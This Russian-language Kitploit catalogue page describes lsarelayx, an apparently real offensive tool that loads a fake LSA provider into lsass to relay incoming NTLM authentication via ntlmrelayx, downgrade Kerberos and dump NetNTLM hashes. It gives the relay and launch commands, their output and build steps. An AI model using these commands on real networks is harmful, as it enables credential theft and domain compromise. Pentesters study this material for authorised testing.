Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
lsarelayx — Системный инструмент для ретрансляции NTLM, который перехватывает API аутентификации Windows для ретрансляции входящих NTLM-соединений, понижения Kerberos и сброса хэшей NetNTLM для офлайн-взлома. | Kitploit
Инструменты/GitHubGitHub/ccob/lsarelayx
Атаки на ПаролиЭксплуатацияТестирование на ПроникновениеАутентификацияRed Teaming
GitHubccob/lsarelayx

lsarelayx

Системный инструмент для ретрансляции NTLM, который перехватывает API аутентификации Windows для ретрансляции входящих NTLM-соединений, понижения Kerberos и сброса хэшей NetNTLM для офлайн-взлома.

Репозиторий
5846614 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

lsarelayx

Введение

lsarelayx — это системный инструмент ретрансляции NTLM, предназначенный для перенаправления входящей аутентификации на основе NTLM на хост, на котором он запущен. lsarelayx будет ретранслировать любые входящие запросы аутентификации, включая SMB. Поскольку lsarelayx внедряется в существующие потоки аутентификации приложений, инструмент также попытается обслужить исходный запрос аутентификации после завершения ретрансляции. Это предотвратит появление ошибок в целевом приложении/протоколе и позволит конечным пользователям аутентифицироваться на хосте lsarelayx в обычном режиме.

Возможности

  • Ретранслирует NTLM-соединения на уровне всей системы, включая SMB, HTTP/HTTPS, LDAP/LDAPS или любые другие сторонние приложения, реализующие API аутентификации Windows.
  • Там, где это возможно, понижает входящие запросы аутентификации Kerberos до NTLM. Это приведет к тому, что клиенты, которые традиционно пытались бы использовать аутентификацию Kerberos, перейдут на NTLM.
  • Выполняет LDAP-запрос для ретранслированного пользователя, чтобы получить информацию о членстве в группах и создать правильный токен аутентификации для исходного запроса.
  • Выгружает сообщения NetNTLM для офлайн-взлома.
  • Поддерживает пассивный режим, который не ретранслирует, а только выгружает захваченные хеши NetNTLM (в этом режиме нет понижения Kerberos).

Как это работает

lsarelayx состоит из трех частей: поддельного поставщика аутентификации LSA, реализованного в liblsarelay.dll, консольного приложения пользовательского режима в качестве интерфейса управления и нового модуля сервера ntlmrelayx под названием RAW.

liblsarelayx.dll

liblsarelayx.dll — это поставщик аутентификации LSA, который загружается lsarelayx. Его основная цель — перехватить пакеты NTLM и Negotiate, чтобы перенаправлять запросы аутентификации в lsarelayx через локальный именованный канал для ретрансляции и сбора хешей NetNTLM. liblsarelayx спроектирован максимально простым, при этом вся тяжелая работа выполняется lsarelayx.

lsarelayx.exe

lsarelayx.exe — это основное консольное приложение, используемое для загрузки пользовательского поставщика аутентификации LSA (liblsarelayx.dll), прослушивания входящих токенов NTLM и Negotiate от поставщика аутентификации и их ретрансляции в модуль RAW сервера ntlmrelayx. Инструмент также выполняет LDAP-запросы для сбора информации о группах ретранслированных пользователей и передачи ее обратно поставщику аутентификации LSA.

RAW ntlmrelayx module

Модуль ntlmrelayx от impacket реализовал значительный объем работы по созданию атак с ретрансляцией и будет продолжать совершенствоваться и добавлять новые атаки в будущем. Чтобы воспользоваться этим вместо повторной реализации атак непосредственно в lsarelayx, был создан новый модуль сервера ntlmrelayx под названием RAW. В настоящее время существует открытый PR на GitHub, реализующий модуль RAW. Модуль RAW не зависит от протокола и предназначен для приема исходных сообщений NTLM непосредственно от стороннего программного обеспечения, такого как lsarelayx.

Пока PR не будет объединен в основной репозиторий impacket, вы можете использовать эту версию.

Использование

Активный режим

Сначала запустите модуль RAW сервера ntmlrelayx для прослушивания исходных сообщений NTLM, передаваемых от lsarelayx.

root@kitploit:~
python examples\ntlmrelayx.py -smb2support --no-wcf-server --no-smb-server --no-http-server "-t" smb://dc.victim.lan

Impacket v0.9.24.dev1+20211015.125134.c0ec6102 - Copyright 2021 SecureAuth Corporation

[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections

Для запуска самого lsarelayx требуются права локального администратора. Для запуска в активном режиме ретрансляции необходимо указать адрес хоста, на котором ntlmrelayx запускает модуль raw сервера. Порт по умолчанию — 6666. Его можно переопределить с помощью аргумента --port, но обязательно также переопределите порт на стороне ntlmrelayx, используя аргумент --raw-port.

root@kitploit:~
lsarelayx.exe --host 192.168.1.1
[+] Using 192.168.1.1:6666 for relaying NTLM connections
[=] Attempting to load LSA plugin C:\users\Administrator\Desktop\liblsarelayx.dll

Пассивный режим

Вы также можете запустить lsarelayx в пассивном режиме, запустив его без аргументов.

root@kitploit:~
lsarelayx.exe
[=] No host supplied, switching to passive mode
[=] Attempting to load LSA plugin C:\users\Administrator\Desktop\liblsarelayx.dll

Предостережения

После загрузки DLL liblsarelayx в lsass в настоящее время вы не можете выгрузить его из-за ограничений работы плагинов LSA. Клиент можно закрыть, что переведет DLL в спящий режим до следующего запуска клиента, но DLL будет использоваться до перезагрузки.

Поскольку плагин LSA не является настоящим плагином, есть планы реализовать внутри него рефлективный загрузчик, который можно будет останавливать и запускать по желанию, но это задача на другой день.

Разработка велась на Windows 10 и Server 2016. Быстрое тестирование проводилось на Windows Server 2012 R2 — оно сработало, но вычисление смещений для перехвата может завершиться ошибкой на 2012 (их можно указать вручную с помощью lookuppackage-hint=, при ошибке Windows перезагрузится). Тестирование на версиях ниже Windows 10 на стороне десктопа не проводилось, а на Server 2019 не тестировалось вообще.

!!ПРЕДУПРЕЖДЕНИЕ!!

liblsarelayx.dll будет загружен внутри критического процесса lsass.exe. Если в liblsarelayx.dll есть какие-либо ошибки, приводящие к сбою lsass.exe, хост ПЕРЕЗАГРУЗИТСЯ через 60 секунд. Хотя были предприняты все усилия для написания безошибочного кода, я ничего не могу обещать. Не приходите ко мне с жалобами, что вы положили клиента из списка Fortune 500, обрушив загруженный файловый сервер после использования lsarelayx.

Сборка

Docker

Если у вас установлен Docker, это самый быстрый вариант. Он использует образ ccob/windows_cross со всеми предустановленными зависимостями для сборки.

Docker on Windows (Powershell)

root@kitploit:~
docker run --rm -it -v $env:pwd\:/root/lsarelayx ccob/windows_cross:latest /bin/bash -c "cd /root/lsarelayx; mkdir build; cd build; cmake -DCMAKE_INSTALL_PREFIX=/root/lsarelayx/dist -DCMAKE_BUILD_TYPE=MinSizeRel -DCMAKE_TOOLCHAIN_FILE=../toolchain/Linux-mingw64.cmake ..; --build . --target install/strip"

Docker on Linux

root@kitploit:~
docker run --rm -it -v $(pwd):/root/lsarelayx ccob/windows_cross:latest /bin/bash -c "cd /root/lsarelayx; mkdir build; cd build; cmake -DCMAKE_INSTALL_PREFIX=/root/lsarelayx/dist -DCMAKE_BUILD_TYPE=MinSizeRel -DCMAKE_TOOLCHAIN_FILE=../toolchain/Linux-mingw64.cmake ..; cmake --build . --target install/strip"

Linux

В Linux мы используем тулчейн CMake вместе с компилятором MinGW. Их необходимо установить заранее. Для управляемого компонента убедитесь, что также установлена утилита командной строки dotnet из .NET core.

root@kitploit:~
mkdir build
cd build
cmake -DCMAKE_INSTALL_PREFIX=$PWD/dist -DCMAKE_BUILD_TYPE=MinSizeRel -DCMAKE_TOOLCHAIN_FILE=../toolchain/Linux-mingw64.cmake ..
cmake --build . --target install/strip

Windows (Powershell)

Windows потребует полной установки CMake, MinGW и Visual Studio, прежде чем пытаться собрать; это самый мучительный способ сборки, если у вас не установлена среда разработки.

root@kitploit:~
mkdir build
cd build
cmake -DCMAKE_INSTALL_PREFIX=$PWD/dist -DCMAKE_BUILD_TYPE=MinSizeRel -G "MinGW Makefiles" ..
cmake --build . --target install/strip
Скачать инструмент